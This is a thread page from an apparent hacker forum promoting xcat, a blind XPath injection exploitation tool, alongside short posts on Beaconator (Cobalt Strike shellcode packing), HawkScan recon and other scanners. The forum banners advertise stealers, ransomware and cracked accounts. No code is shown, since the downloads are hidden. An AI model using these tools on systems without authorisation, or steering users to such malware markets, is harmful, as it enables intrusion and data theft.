Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

 

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Sign in to follow this  
      itsMe

      xcat v1.0.5 - exploit and investigate blind XPath injection

      Recommended Posts

      Staff

      Hidden Content

        Give reaction to this post to see the hidden content.

      XCat is a command line tool to exploit and investigate blind XPath injection vulnerabilities.

      For a complete reference read the documentation here:

      Hidden Content

        Give reaction to this post to see the hidden content.

      It supports an large number of features:

          Auto-selects injections (run xcat injections for a list)

          Detects the version and capabilities of the xpath parser and selects the fastest method of retrieval

          Built in out-of-bound HTTP server
              Automates XXE attacks
              Can use OOB HTTP requests to drastically speed up retrieval

          Custom request headers and body

          Built in REPL shell, supporting:
              Reading arbitrary files
              Reading environment variables
              Listing directories
              Uploading/downloading files (soon TM)

          Optimized retrieval
              Uses binary search over unicode codepoints if available
              Fallbacks include searching for common characters previously retrieved first
              Normalizes unicode to reduce the search space


      Hidden Content

        Give reaction to this post to see the hidden content.

      Share this post


      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.
      Sign in to follow this  

      • Similar Content

        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. An Advanced Web Crawler and DirBuster PeNCrawLer is an advanced webcrawler and dirbuster designed to use in penetration testing based on Windows Os.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Juumla is a python tool developed to identify the current Joomla version and scan for readable Joomla config files.
          Features
              Fast scan
              Low RAM and CPU usage
              Identify Joomla version
              Config files detection
              Open-Source

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Beaconator
          Beaconator is an aggressor script for Cobalt Strike used to generate a raw stageless shellcode and packing the generated shellcode using PEzor.
          Changelog v1.1
              Fixed error check with the use of x86 arch & syscalls
              Fixed the “null value error” due to missing output folder
              Fixed issue with options persisting to subsequent payload generations
              Added PEzor’s BOF format
              Added the -cleanup option for BOFs
              Added the -sleep option
              Added more error checks
              Cleaned up the code

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. HawkScan
          Security Tool for Reconnaissance and Information Gathering on a website. (python 2.x & 3.x)
          This script uses “WafW00f” to detect the WAF in the first step.
          This script uses “Sublist3r” to scan subdomains.
          This script uses “waybacktool” to check in the waybackmachine.

          Features
               URL fuzzing and dir/file detection
               Test backup/old file on all the files found (index.php.bak, index.php~ …)
               Check header information
               Check DNS information
               Check whois information
               User-agent random or personal
               Extract files
               Keep a trace of the scan
               Check @mail in the website and check if @mails leaked
               CMS detection + version and vulns
               Subdomain Checker
              Backup system (if the script stopped, it take again in the same place)
               WAF detection
               Add personal prefix
              Auto-update script
               Auto or personal output of scan (scan.txt)
               Check Github
              Recursive dir/file
              Scan with an authentication cookie
               Option –profil to pass profil page during the scan
               HTML report
               Work it with py2 and py3
              Add option rate-limit if the app is unstable (–timesleep)
              Check-in waybackmachine
               Response error to WAF
              Check if DataBase firebaseio exist and accessible
              Automatic threads depending on the response to a website (and reconfig if WAF detected too many times). Max: 30
               Search S3 buckets in source code page
               Testing bypass of waf if detected
               Testing if it’s possible scanning with “localhost” host
          Changelog v1.8.6
              Fixed: Any bugs: Thread modification, header parameters, bypass forbidden & any others…
              Added: google module in requirements/setup
              Updated: Deleted degoogle modules/script, google dork works now with the “googlesearch” module
              Updated: A little style modification
              Updated: Default thread now 30

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. This is a universal Reddit scraper that can scrape Subreddits, Redditors, and comments on posts.
          Scrape speeds will be determined by the speed of your internet connection.
          Changelog v3.3.2
              Added
                  Source code
                      In Redditor.py:
                          Added a new method GetInteractions._get_user_subreddit() – extracts subreddit data from the UserSubreddit object into a dictionary.
                  Tests
                      In test_Redditor.py:
                          Added TestGetUserSubredditMethod().test_get_user_subreddit() to test the new method.
              Changed
                  Source code
                      In Redditor.py:
                          GetInteractions._get_user_info() calls the new GetInteractions._get_user_subreddit() method to set the Redditor’s subreddit data within the main Redditor information dictionary.
                      In Version.py:
                          Incremented version number.
                  README
                      Incremented PRAW badge version number.

          Hidden Content
          Give reaction to this post to see the hidden content.